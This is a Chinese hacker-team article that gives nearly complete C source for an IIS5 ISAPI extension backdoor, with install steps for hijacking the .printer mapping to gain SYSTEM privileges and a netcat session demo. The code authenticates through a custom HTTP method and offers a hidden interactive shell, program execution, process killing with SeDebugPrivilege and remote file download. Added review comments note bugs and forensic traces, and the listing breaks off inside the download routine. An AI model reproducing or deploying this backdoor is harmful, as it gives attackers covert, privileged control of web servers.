IIS5 ISAPI Extension Back Door
Our Team: http://www.ph4nt0m.org
Author: 云舒([email protected])
感谢与参考
1.在获取shell的时候格式很难看,envymask告诉我是网络延迟的原因,得以解决,感谢!
2.参考《绿盟安全月刊》第37期的技术专题里面的第五章《Exploit Microsoft INTERNET INFORMATION SERVER》,地址为http://www.nsfocus.net/index.php?act=magazine&do=view&mid=1662
3.参考MSDN函数库
一.前言
二.申明
三.实现
四.参考
一.前言
最近的sql injection攻击很流行,一般的解决方法是使用通用的防注入函数来保护程序不受威胁。但是有些程序作者经常忘记包含通用函数,导致没有效果。前些日子研究彻底防止SQL Injection攻击时,看了些IIS5的ISAPI Filter文档,决定利用IIS提供的API接口做个东西,这样可以很好的防止sql injection攻击。
凑巧发现,这样依附在IIS上面的扩展模块,还可以作为别的用处,比如作为一个后门程序。这样进程的隐藏,端口的隐藏,服务的隐藏问题都不需要解决,由IIS包办了。作为后门,为了隐蔽性,我选择了ISAPI Extension接口。前后大约一个多星期,做出了一个这样的东西,还不知道叫什么名字好。
二.申明
1.代码里面有些特殊字符,因为我忘记不了她,请自己修改。
2.代码可以随意转载,但是请保证文档完整,并不得用于商业用途。
3.代码可以随意修改,但是如果能够给我一份,将不胜感激。
4.代码我只是演示这种后门的危害,用做任何用途均与我无关。
三.实现
1.解析
鉴于隐蔽性,我没有选择ISAPI Filter,而是选择了ISAPI Extension方式。ISAPI Extension是IIS的功能扩展模块,它能独立支持某一项特殊的HTTP请求,系统默认支持的asp脚本由%SystemRoot%\system32\inetsrv\inetsrv\asp.dll解析。自己实现一个动态链接库,就可以实现自己特殊的功能,例如php就是利用自己带的dll文件来解析php文件的。IIS先获取请求文件的扩展名,再根据配置的应用程序映射,交由特定的dll处理。
2.权限
IIS5的配置都保存在%SystemRoot%\system32\inetsrv\MetaBase.bin文件中,它有两个主键:LM和Schema。LM主键下面有W3SVC/InProcessIsapiApps键,这是一个数组,里面包含的是一组指向一些ISAPI的路径。在这个数组里面的ISAPI运行的时候都是由inetinfo.exe直接启动的,继承inetinfo.exe的local system权限;而不在其中的ISAPI则是由svchost.exe派生的dllhost.exe进程启动的,运行的身份是IWAM_NAME,权限极低。这里,我们可以使用iis的脚本adsutil.vbs将我们的dll加到数组当中,命令为adsutil.vbs set w3svc/inprocessisapiapps Dll Path。更好的办法是替换掉printer扩展的映射,此映射由%systemroot%\msw3prt.dll来解析,而且这个dll文件默认存在于W3SVC/InProcessIsapiApps键中。这也就是2000年.printer溢出得到system权 限的原因。
3.导出
根据MSDN描述,ISAPI Extension需要导出三个函数,GetExtensionVersion,TerminateExtension以及HttpExtensionProc
4.功能
首先,密码功能肯定是需要的,这里我将标准的HTTP协议扩充出一个Icy方法,如果客户端使用此方法请求注册的映射,则认证成功,否则不予理睬。这里,你也可以修改代码,使用HTTP协议的其他部分做认证,比如Accept字段。
其次,后门主要是获取一个shell,但是某些服务器可能设置了禁止system访问cmd,因此,我还提供了下载功能,这样可以下载一个cmd,然后通过shell CustomerCmd运行,得到shell执行命令。最后就是列举进程和查杀进程了。
在虚拟机上测试,我注册了扩展名为yunshu交由此dll解析。使用nc连接,发送自己扩展的http协议,屏幕copy如下:
C:>nc -vv 192.168.10.250 80
Warning: forward host lookup failed for Icy.missyou.com: h_errno 11004:NO_DATA
Icy.missyou.com [192.168.10.250] 80 (http) open: unknown socket error
Icy /test.yunshu HTTP/1.0
HOST: 192.168.10.250
Can you tell me how to forget some one?
Code by 云舒
Our team:www.ph4nt0m.org
Icy>help
Now,Support these command:
pslist--------------List Process Information
kill PID------------Kill The Process
exec Program--------Run A Program
shell ShellPath-----Get A System Shell,Normal shell cmd.exe
down URL------------DownLoad A File
exit----------------Exit
Icy>
5.代码
// ISAPI EXTENSION BACK DOOR
// Code by 云舒
// Thx EnvyMask
// 修改2005-08-14凌晨
// 最后2005-08-16
// Compiled On: Windows Server2003,VC++ 6.0
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <httpext.h>
#include <urlmon.h>

#pragma comment(lib, "urlmon.lib")

// Build switch: with DEBUG defined, every #ifdef DEBUG block below appends the
// login event and each received command to LOGPATH. For an investigator that
// file is an on-disk trace of the extension's activity.
#define DEBUG
#define LOGPATH "c:\ISAPI_LOG.txt"   // NOTE(review): lone backslash as extracted; presumably "c:\\ISAPI_LOG.txt" in the original

// The "password" is the HTTP request method. HttpExtensionProc compares only
// this prefix, and the method string is what IIS request logging records.
#define PASSWORD "Icy"

// Prompt written to the client before each command.
#define FLAG "Icy>"

// Buffer sizes. BUFFSIZE is unparenthesized; every use below is as a bare
// argument or initializer, so it expands as intended there.
#define BUFFSIZE 1024 * 4
#define ARGSIZE 1024

// Per-command argument handed to a worker thread: the request's control block
// plus the text after the command verb. Instances live on SwitchCmd's stack.
typedef struct workArg
{
    EXTENSION_CONTROL_BLOCK *pECB;
    char arg[ARGSIZE];
}WORKARG;

// Prototypes
BOOL StartWith( char * , char * );                        // does the first string begin with the second
void SwitchCmd( EXTENSION_CONTROL_BLOCK * , char * );     // dispatch one command line to its handler
void PsList( EXTENSION_CONTROL_BLOCK * );                 // list processes
void Kill( LPVOID );                                      // terminate a process by PID
void Shell( LPVOID );                                     // interactive shell relayed over the request connection
void ExecProgram( LPVOID );                               // run a program and return one chunk of its output
void Help( EXTENSION_CONTROL_BLOCK * );                   // print the command list (defined outside this view)
void DownLoad( LPVOID );                                  // fetch a file by URL
BOOL SendToClient( EXTENSION_CONTROL_BLOCK * , char * );  // write a string to the client (defined outside this view)
void LogStrToFile( char * );                              // append a string to the debug log
void LogIntToFile( int );                                 // append an integer to the debug log
41
// DLL entry point. Nothing is initialized on attach or released on detach.
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved )
{
    return TRUE;
}
49
// ISAPI version handshake. Reports the HSE version this was built against and
// a fixed description. The 15-byte literal fits the fixed-size
// lpszExtensionDesc array, so the unbounded strcpy is safe here.
BOOL WINAPI GetExtensionVersion(HSE_VERSION_INFO *pVer)
{
    pVer->dwExtensionVersion = MAKELONG(HSE_VERSION_MINOR,HSE_VERSION_MAJOR);
    strcpy( pVer->lpszExtensionDesc, "What_Can_I_Do?" );

    return TRUE;
}
58
59
// Called by IIS when the extension is unloaded; nothing to release.
BOOL WINAPI TerminateExtension( DWORD dwFlags )
{
    return TRUE;
}
64
// Request handler. Gates on the request method, then runs a read/dispatch
// loop on the same connection until the client sends "exit\n".
//
// Returns HSE_STATUS_SUCCESS on both the rejected and the normal path. It
// never returns HSE_STATUS_PENDING, so the IIS worker thread that entered is
// held for the whole session; a long-running request on the mapped extension
// is the server-side symptom of an active session.
DWORD WINAPI HttpExtensionProc(EXTENSION_CONTROL_BLOCK * pECB)
{
    char buff[BUFFSIZE] = { 0 };
    char *err = "Error...\n";
    char *helo = "Can you tell me how to forget some one?\nCode by 云舒\nOur team:www.ph4nt0m.org\n\n";

    // Only the first 64 bytes of buff are offered to GetServerVariable.
    DWORD dwBytes = 64;

    // Read the request method. Neither the result nor the written size is
    // checked; on failure buff stays zeroed and the compare below rejects.
    pECB->GetServerVariable( pECB->ConnID , "REQUEST_METHOD" , buff , &dwBytes );

    // Prefix compare: any method beginning with PASSWORD is accepted.
    if ( strncmp( buff , PASSWORD , strlen(PASSWORD) ) != 0 )
    {
        SendToClient( pECB , err );
        return HSE_STATUS_SUCCESS;
    }

#ifdef DEBUG
    LogStrToFile( "-------------------------------\n" );
    LogStrToFile( "客户端成功登陆\n" );
#endif

    SendToClient( pECB , helo );
    SendToClient( pECB , FLAG );

    while(TRUE)
    {
        ZeroMemory( buff , BUFFSIZE );
        dwBytes = BUFFSIZE;

        // Poll once a second until the client has sent at least one byte.
        // ReadClient's return value is ignored and dwBytes is not reset
        // between polls; if reads keep failing this loop never exits.
        // NOTE(review): '' reads as an empty char constant; presumably '\0' lost in extraction.
        while( buff[0] == '' )
        {
            Sleep(1000);
            pECB->ReadClient( pECB->ConnID , buff , &dwBytes );
        }

        // Exact match: "exit" followed by a single LF.
        if( strcmp( buff , "exit\n" ) == 0 )
        {
            SendToClient( pECB , "ByeBye...\n" );
            break;
        }

        // One command per iteration; SwitchCmd blocks until its handler
        // finishes or its wait times out.
        SwitchCmd( pECB , buff );
    }

    return HSE_STATUS_SUCCESS;
}
112
// Dispatch one command line. Each handler runs on a new thread; this function
// waits for it (bounded for pslist/kill/exec/help, unbounded for shell/down)
// and, for some branches, writes the prompt afterwards.
//
// workArg is a stack variable whose address is handed to the worker. When a
// bounded wait expires the thread is only closed, not stopped, so a slow
// worker can outlive this frame. Workers also keep pECB, which is only valid
// until HttpExtensionProc returns. The (LPTHREAD_START_ROUTINE) casts hide
// that the handlers return void rather than DWORD.
void SwitchCmd( EXTENSION_CONTROL_BLOCK *pECB , char *buff )
{
    WORKARG workArg;
    HANDLE hThread = NULL;
    DWORD threadID = 0;

    //SendToClient( pECB , "客户端命令: " );
    //SendToClient( pECB , buff );

#ifdef DEBUG
    LogStrToFile( "客户端命令: " );
    LogStrToFile( buff );
#endif

    // Strip the trailing newline. strchr returns NULL when there is none
    // (input that did not end on a line break) and that NULL is written
    // through unconditionally.
    // NOTE(review): '' reads as an empty char constant; presumably '\0' lost in extraction.
    *(strchr( buff , '\n' )) = '';

    // The argument must fit WORKARG.arg; the strcpy calls below are unbounded.
    // Offset 5 is where the "kill "/"exec "/"down " argument starts; the
    // "shell " argument at offset 6 is one byte shorter, so it is covered too.
    if( strlen( buff+5 ) >= ARGSIZE )
    {
        SendToClient( pECB , "Arguments is too long...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

    // Clear the argument buffer before handing it to a worker.
    ZeroMemory( workArg.arg , sizeof(workArg.arg) );

    // pslist: no argument, pECB is passed straight to the worker.
    if( StartWith(buff , "pslist") )
    {
        hThread = CreateThread( NULL ,
                                0 ,
                                (LPTHREAD_START_ROUTINE)PsList ,
                                (LPVOID)pECB ,
                                0 ,
                                &threadID );

        if( hThread == NULL )
        {
#ifdef DEBUG
            LogStrToFile( "创建线程列举进程失败,错误码: " );
            LogIntToFile( GetLastError( ) );
            LogStrToFile( "\n" );
#endif

            SendToClient( pECB , "List process error...\n" );
            SendToClient( pECB , FLAG );

            return;
        }

        // At most 6 s for the listing; then the prompt, whether or not it finished.
        WaitForSingleObject( hThread , 6000 );
        CloseHandle( hThread );
        SendToClient( pECB , FLAG );

        return;
    }

    // kill <pid>: argument is everything after "kill ".
    else if( StartWith(buff , "kill") )
    {
        // No argument.
        if( *( buff+5 ) == '' )
        {
            SendToClient( pECB , "Usage:kill pid\n" );
            SendToClient( pECB , FLAG );

            return;
        }

        workArg.pECB = pECB;
        strcpy( workArg.arg , buff+5 );   // length already bounded by the ARGSIZE check

        hThread = CreateThread( NULL ,
                                0 ,
                                (LPTHREAD_START_ROUTINE)Kill ,
                                (LPVOID)&workArg ,
                                0 ,
                                &threadID );

        if( hThread == NULL )
        {
#ifdef DEBUG
            LogStrToFile( "创建线程杀进程失败,错误码: " );
            LogIntToFile( GetLastError( ) );
            LogStrToFile( "\n" );
#endif

            SendToClient( pECB , "Kill process error...\n" );
            SendToClient( pECB , FLAG );

            return;
        }
        // At most 5 s; the prompt is written here, not by Kill.
        WaitForSingleObject( hThread , 5000 );
        CloseHandle( hThread );
        SendToClient( pECB , FLAG );

        return;
    }

    // shell <path>: argument is everything after "shell ". The path is
    // explicit so the operator is not tied to the default cmd.exe location.
    else if( StartWith(buff , "shell") )
    {
        // No argument.
        if( *( buff+6 ) == '' )
        {
            SendToClient( pECB , "Usage:shell ShellPath\n" );
            SendToClient( pECB , FLAG );

            return;
        }

        workArg.pECB = pECB;
        strcpy( workArg.arg , buff+6 );

        hThread = CreateThread( NULL ,
                                0 ,
                                (LPTHREAD_START_ROUTINE)Shell ,
                                (LPVOID)&workArg ,
                                0 ,
                                &threadID );

        if( hThread == NULL )
        {
#ifdef DEBUG
            LogStrToFile( "创建线程执行shell失败,错误码: " );
            LogIntToFile( GetLastError( ) );
            LogStrToFile( "\n" );
#endif

            SendToClient( pECB , "Get shell error...\n" );
            SendToClient( pECB , FLAG );

            return;
        }
        // Unbounded wait: the request thread stays inside the shell session.
        // No prompt is written on return.
        WaitForSingleObject( hThread , INFINITE );
        CloseHandle( hThread );

        return;
    }

    // exec <program>: argument after "exec ".
    else if( StartWith(buff , "exec") )
    {
        // No argument. The usage text still says "shell" (copied from the
        // branch above); it is a runtime string and left as is.
        if( *( buff+5 ) == '' )
        {
            SendToClient( pECB , "Usage:shell ShellPath\n" );
            SendToClient( pECB , FLAG );

            return;
        }

        workArg.pECB = pECB;
        strcpy( workArg.arg , buff+5 );

        hThread = CreateThread( NULL ,
                                0 ,
                                (LPTHREAD_START_ROUTINE)ExecProgram ,
                                (LPVOID)&workArg ,
                                0 ,
                                &threadID );

        if( hThread == NULL )
        {
#ifdef DEBUG
            LogStrToFile( "创建线程运行程序失败,错误码: " );
            LogIntToFile( GetLastError( ) );
            LogStrToFile( "\n" );
#endif

            SendToClient( pECB , "Execute program error...\n" );
            SendToClient( pECB , FLAG );

            return;
        }
        // At most 10 s; ExecProgram may still be blocked waiting for output
        // after this returns. No prompt is written on this path.
        WaitForSingleObject( hThread , 10000 );
        CloseHandle( hThread );

        return;
    }

    // down <url>: argument after "down ".
    else if( StartWith(buff , "down") )
    {
        // No argument.
        if( *( buff+5 ) == '' )
        {
            SendToClient( pECB , "Usage:down http://www.andsky.com/test.exe\n" );
            SendToClient( pECB , FLAG );

            return;
        }

        workArg.pECB = pECB;
        strcpy( workArg.arg , buff+5 );

        hThread = CreateThread( NULL ,
                                0 ,
                                (LPTHREAD_START_ROUTINE)DownLoad ,
                                (LPVOID)&workArg ,
                                0 ,
                                &threadID );

        if( hThread == NULL )
        {
#ifdef DEBUG
            LogStrToFile( "创建线程下载文件失败,错误码: " );
            LogIntToFile( GetLastError( ) );
            LogStrToFile( "\n" );
#endif

            SendToClient( pECB , "Download file error...\n" );
            SendToClient( pECB , FLAG );

            return;
        }
        // Unbounded wait for the download, then the prompt.
        WaitForSingleObject( hThread , INFINITE );
        CloseHandle( hThread );
        SendToClient( pECB , FLAG );

        return;
    }

    // Anything else: print the command list.
    else
    {
        hThread = CreateThread( NULL ,
                                0 ,
                                (LPTHREAD_START_ROUTINE)Help ,
                                (LPVOID)pECB ,
                                0 ,
                                &threadID );

        if( hThread == NULL )
        {
#ifdef DEBUG
            LogStrToFile( "创建线程输出帮助信息失败,错误码: " );
            LogIntToFile( GetLastError( ) );
            LogStrToFile( "\n" );
#endif

            SendToClient( pECB , "Print help error...\n" );
            SendToClient( pECB , FLAG );

            return;
        }
        WaitForSingleObject( hThread , 5000 );
        CloseHandle( hThread );
        SendToClient( pECB , FLAG );

        return;
    }
}
368
// TRUE when buf1 begins with buf2. Compares strlen(buf2) bytes with memcmp,
// so buf1 must be at least that long (the callers pass a BUFFSIZE buffer,
// which keeps the read in bounds even for short input). Neither pointer is
// checked for NULL.
BOOL StartWith( char *buf1, char *buf2 )
{
    int len = strlen(buf2);

    if( memcmp( buf1,buf2,len) == 0)
    {
        return TRUE;
    }
    return FALSE;
}
380
// Interactive shell. Starts the program named in workArg->arg with stdin,
// stdout and stderr redirected through two anonymous pipes, then relays pipe
// output to the client and client input to the pipe until "exit\n" or an
// I/O error.
//
// The child is created with a hidden window and inheritable handles, in the
// security context of the process hosting this extension (inetinfo.exe when
// registered in-process, per the write-up above), so it appears as a child of
// that process. On exit the child is killed with TerminateProcess; the
// procInfo process/thread handles are never closed, and the pipe handles are
// leaked on the CreateProcess failure path and on the second CreatePipe
// failure path.
void Shell( LPVOID arg )
{
    WORKARG *workArg = (WORKARG *)arg;

    SECURITY_ATTRIBUTES sa;
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;   // pipe 1: child output -> here; pipe 2: here -> child stdin
    STARTUPINFO si;
    PROCESS_INFORMATION procInfo;
    char cmdLine[ARGSIZE] = { 0 };
    char buff[BUFFSIZE] = { 0 };
    int ret = 0;
    unsigned long dwBytes = 0;
    int index = 0;

    EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;

    // Both arrays are ARGSIZE and the caller bounded the argument, so this fits.
    strcpy( cmdLine , workArg->arg );

    // NOTE(review): '' reads as an empty char constant; presumably '\0' lost in extraction.
    if( cmdLine[0] == '' )
    {
#ifdef DEBUG
        LogStrToFile( "执行shell时,没有要输入要运行的shell路径\n" );
#endif

        SendToClient( pECB , "No shell to run...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

#ifdef DEBUG
    LogStrToFile( "要运行的程序: " );
    LogStrToFile( workArg->arg );
    LogStrToFile( "\n" );
#endif

    // Inheritable pipe handles so the child can use them as its std handles.
    sa.nLength = sizeof( sa );
    sa.lpSecurityDescriptor = 0;
    sa.bInheritHandle = TRUE;

    // Pipe 1 carries the child's stdout/stderr.
    if( !CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0) )
    {
#ifdef DEBUG
        LogStrToFile( "建立管道失败: " );
        LogIntToFile( GetLastError() );
        LogStrToFile( "\n" );
#endif

        SendToClient( pECB , "Create pipi error...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

    // Pipe 2 carries the child's stdin. Pipe 1 is not closed if this fails.
    if( !CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0) )
    {
#ifdef DEBUG
        LogStrToFile( "建立管道失败: " );
        LogIntToFile( GetLastError() );
        LogStrToFile( "\n" );
#endif

        SendToClient( pECB , "Create pipi error...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

    ZeroMemory( &si , sizeof(STARTUPINFO) );
    GetStartupInfo( &si );

    si.cb = sizeof( si );
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;                       // no visible console
    si.hStdInput = hReadPipe2;
    si.hStdOutput = si.hStdError = hWritePipe1;

    ZeroMemory( &procInfo , sizeof(PROCESS_INFORMATION) );

    // bInheritHandles = 1 so the child receives the pipe ends (and every other
    // inheritable handle of the host process). No token is supplied, so the
    // child runs as the host process.
    ret = CreateProcess( NULL , cmdLine , NULL , NULL , 1 , 0 , NULL , NULL , &si , &procInfo );
    if( !ret )
    {
#ifdef DEBUG
        LogStrToFile( "建立进程失败...\n" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "Create process error...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

    while(1)
    {
        memset( buff , 0 , BUFFSIZE );

        ret=PeekNamedPipe( hReadPipe1 , buff , BUFFSIZE , &dwBytes , NULL , NULL );

        // Retry the peek up to five times, 100 ms apart, so slow child output
        // is not mistaken for "nothing pending". ret is overwritten, never checked.
        for( index = 0; index < 5 && dwBytes == 0; index ++ )
        {
            Sleep(100);
            ret = PeekNamedPipe(hReadPipe1,buff,BUFFSIZE,&dwBytes,NULL,NULL);
        }

        // Output pending: read it and forward it. dwBytes is both the request
        // size and the count read. A full BUFFSIZE read leaves no terminating
        // NUL in buff for SendToClient (presumably string-based).
        if(dwBytes)
        {
            ret = ReadFile( hReadPipe1,buff,dwBytes,&dwBytes,0 );
            if( !ret )
            {
#ifdef DEBUG
                LogStrToFile( "读取输出失败: " );
                LogIntToFile( GetLastError() );
                LogStrToFile( "\n" );
#endif

                break;
            }

#ifdef DEBUG
            LogStrToFile( buff );
#endif

            // SendToClient returns BOOL; FALSE is treated as a send failure.
            ret = SendToClient( pECB , buff );
            if( ret<=0 )
            {
#ifdef DEBUG
                LogStrToFile( "发送输出失败:" );
                LogIntToFile( GetLastError() );
                LogStrToFile( "\n" );
#endif

                break;
            }
        }

        // No child output: wait for client input.
        else
        {
            // Poll every 100 ms until at least one byte arrives. ReadClient's
            // result is ignored, so if reads keep failing this never exits.
            while( buff[0] == '' )
            {
                Sleep(100);
                dwBytes = BUFFSIZE;

                pECB->ReadClient( pECB->ConnID , buff , &dwBytes );
            }

#ifdef DEBUG
            LogStrToFile( "读到客户命令了,内容是: " );
            LogStrToFile( buff );
#endif

            // "exit" ends the session (exact match including the LF).
            if( strcmp( buff , "exit\n" ) == 0 )
            {
                SendToClient( pECB , "ByeBye~!\n" );
                break;
            }

            // Forward the raw bytes (count from ReadClient) to the child's stdin.
            ret = WriteFile( hWritePipe2 , buff , dwBytes , &dwBytes , 0 );
            if( !ret )
            {
#ifdef DEBUG
                LogStrToFile( "把命令发送到shell失败\n" );
                LogIntToFile( GetLastError() );
                LogStrToFile( "\n" );
#endif

                break;
            }
        }
    }
    CloseHandle(hReadPipe1);
    CloseHandle(hReadPipe2);
    CloseHandle(hWritePipe1);
    CloseHandle(hWritePipe2);

    // Forcibly end the child; procInfo handles are left open.
    TerminateProcess( procInfo.hProcess , 0 );

    return;
}
568
// Run the program named in workArg->arg with stdout/stderr captured through
// one anonymous pipe, wait until it produces output, forward the first chunk
// to the client, and then kill it.
//
// Only the first read is forwarded. The output wait has no timeout, so a
// child that writes nothing keeps this thread blocked after the caller's
// 10 s wait has already returned. No prompt is written on success. The
// procInfo handles are never closed; the pipe handles leak on the
// CreateProcess failure path.
void ExecProgram( LPVOID arg )
{
    WORKARG *workArg = (WORKARG *)arg;

    SECURITY_ATTRIBUTES sa;
    HANDLE hReadPipe1 = NULL;
    HANDLE hWritePipe1 = NULL;
    STARTUPINFO si;
    PROCESS_INFORMATION procInfo;
    char cmdLine[ARGSIZE] = { 0 };
    char buff[BUFFSIZE] = { 0 };
    int ret = 0;
    unsigned long dwBytes = 0;

    EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;

    // Both arrays are ARGSIZE and the caller bounded the argument, so this fits.
    strcpy( cmdLine , workArg->arg );

    // NOTE(review): '' reads as an empty char constant; presumably '\0' lost in extraction.
    if( cmdLine[0] == '' )
    {
#ifdef DEBUG
        LogStrToFile( "执行程序时,没有要输入要运行的程序\n" );
#endif

        SendToClient( pECB , "No program to run...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

#ifdef DEBUG
    LogStrToFile( "要运行的程序: " );
    LogStrToFile( workArg->arg );
    LogStrToFile( "\n" );
#endif

    // Inheritable pipe handles so the child can write to them.
    sa.nLength = sizeof( sa );
    sa.lpSecurityDescriptor = 0;
    sa.bInheritHandle = TRUE;

    // Single pipe: child output -> here. No stdin is provided.
    if( !CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0) )
    {
#ifdef DEBUG
        LogStrToFile( "建立管道失败: " );
        LogIntToFile( GetLastError() );
        LogStrToFile( "\n" );
#endif

        SendToClient( pECB , "Create pipi error...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

    ZeroMemory( &si , sizeof(STARTUPINFO) );
    GetStartupInfo( &si );

    si.cb = sizeof( si );
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;                       // no visible window
    si.hStdOutput = si.hStdError = hWritePipe1;

    ZeroMemory( &procInfo , sizeof(PROCESS_INFORMATION) );

    // bInheritHandles = 1; no token supplied, so the child runs as the host process.
    ret = CreateProcess( NULL , cmdLine , NULL , NULL , 1 , 0 , NULL , NULL , &si , &procInfo );
    if( !ret )
    {
#ifdef DEBUG
        LogStrToFile( "建立进程失败...\n" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "Create process error...\n" );
        SendToClient( pECB , FLAG );

        return;
    }

    memset( buff , 0 , BUFFSIZE );

    // Block (200 ms polls, no limit) until the child has written something.
    while( dwBytes == 0 )
    {
        Sleep(200);
        ret = PeekNamedPipe(hReadPipe1,buff,BUFFSIZE,&dwBytes,NULL,NULL);
    }

    // One read only. On failure execution falls through and sends buff anyway.
    ret = ReadFile( hReadPipe1,buff,dwBytes,&dwBytes,0 );
    if( !ret )
    {
#ifdef DEBUG
        LogStrToFile( "读取输出失败: " );
        LogIntToFile( GetLastError() );
        LogStrToFile( "\n" );
#endif
    }

#ifdef DEBUG
    LogStrToFile( buff );
#endif

    // SendToClient returns BOOL; FALSE is logged but not otherwise handled.
    ret = SendToClient( pECB , buff );
    if( ret<=0 )
    {
#ifdef DEBUG
        LogStrToFile( "发送输出失败:" );
        LogIntToFile( GetLastError() );
        LogStrToFile( "\n" );
#endif
    }

    CloseHandle(hReadPipe1);
    CloseHandle(hWritePipe1);

    // The child is killed after its first output chunk, whatever it was doing.
    TerminateProcess( procInfo.hProcess , 0 );

    return;
}
690
// Write one "PID\t\tProcessName" line per process from a Toolhelp snapshot.
// The prompt is written by the caller after its wait, not here. hProcess is
// unused. The snapshot handle is closed only on the Process32First failure
// path; on the normal path it leaks.
void PsList( EXTENSION_CONTROL_BLOCK *pECB )
{
    HANDLE hProcessSnap = NULL;
    HANDLE hProcess = NULL;
    PROCESSENTRY32 pe32;
    char psBuff[BUFFSIZE] = { 0 };

    SendToClient( pECB , "Process Information List 0.1\n\n" );
    /*
    SendToClient( pECB , "Code by 云舒([email protected])\n" );
    SendToClient( pECB , "www.ph4nt0m.org www.icylife.net\n" );
    */

    hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if( hProcessSnap == INVALID_HANDLE_VALUE )
    {
#ifdef DEBUG
        LogStrToFile( "Call CreateToolhelp32Snapshot error" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "List process information error...\n" );

        return;
    }

    // dwSize must be set before the first Process32First call.
    pe32.dwSize = sizeof( PROCESSENTRY32 );

    if( !Process32First( hProcessSnap, &pe32 ) )
    {
#ifdef DEBUG
        LogStrToFile( "Call Process32First error" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "List process information error...\n" );

        SendToClient( pECB , FLAG );

        CloseHandle( hProcessSnap );

        return;
    }

    SendToClient( pECB , "PID\t\tProcessName\n" );

    // szExeFile is a fixed-size member of PROCESSENTRY32, so the formatted
    // line fits comfortably in the BUFFSIZE buffer. %d is used for a DWORD.
    do
    {
        ZeroMemory( psBuff , sizeof(psBuff) );
        sprintf( psBuff , "%d\t\t%s\n", pe32.th32ProcessID , pe32.szExeFile );

        SendToClient( pECB , psBuff );
    }
    while( Process32Next( hProcessSnap, &pe32 ) );

    return;
}
748
// Terminate the process whose PID is in workArg->arg. First enables
// SeDebugPrivilege on the host process's own token; nothing disables it
// again, so it stays enabled in the IIS process afterwards, which is a
// notable event wherever privilege-use auditing is on.
//
// The PID is parsed with atoi and not validated (non-numeric input yields 0).
// AdjustTokenPrivileges' result is not checked. hToken is closed right after
// the adjustment and then closed a second time on each later path; it leaks
// on the LookupPrivilegeValue failure path. OpenProcess returns NULL on
// failure, so the INVALID_HANDLE_VALUE comparison is redundant. The prompt
// is written by the caller, not here.
void Kill( LPVOID arg )
{
    WORKARG *workArg = (WORKARG *)arg;

    HANDLE hProcess = NULL;
    DWORD pID;

    EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;

    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;

    pID = atoi( workArg->arg );

    if ( !OpenProcessToken( GetCurrentProcess() , TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY , &hToken ) )
    {
#ifdef DEBUG
        LogStrToFile( "Call OpenProcessToken error" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "Kill process error...\n" );

        return;
    }

    if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
    {
#ifdef DEBUG
        LogStrToFile( "Call LookupPrivilegeValue error" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "Kill process error...\n" );

        return;   // hToken not closed on this path
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Return value unchecked; partial/failed adjustment is only visible via GetLastError.
    AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL );

    CloseHandle( hToken );   // first close; the paths below close it again

    hProcess = OpenProcess( PROCESS_TERMINATE , FALSE , pID );
    if( hProcess ==INVALID_HANDLE_VALUE || hProcess == NULL )
    {
#ifdef DEBUG
        LogStrToFile( "Call OpenProcess error" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "Kill process error...\n" );

        CloseHandle( hToken );
        CloseHandle( hProcess );

        return;
    }

    // Exit code 0xFFFFFFFF is what the terminated process reports.
    if ( !TerminateProcess( hProcess, (DWORD) -1 ) )
    {
#ifdef DEBUG
        LogStrToFile( "Call TerminateProcess error" );
        LogIntToFile( GetLastError() );
#endif

        SendToClient( pECB , "Kill process error...\n" );

        CloseHandle( hToken );
        CloseHandle( hProcess );

        return;
    }

    SendToClient( pECB , "killed ok\n" );

    CloseHandle( hToken );
    CloseHandle( hProcess );
    return;
}
833
834void DownLoad( LPVOID arg )
835{
836WORKARG *workArg = (WORKARG *)arg;
837
838char fileName[64] = { 0 };//保存的文件名</urlmon.h></httpext.h></tlhelp32.h></windows.h></string.h></stdio.h>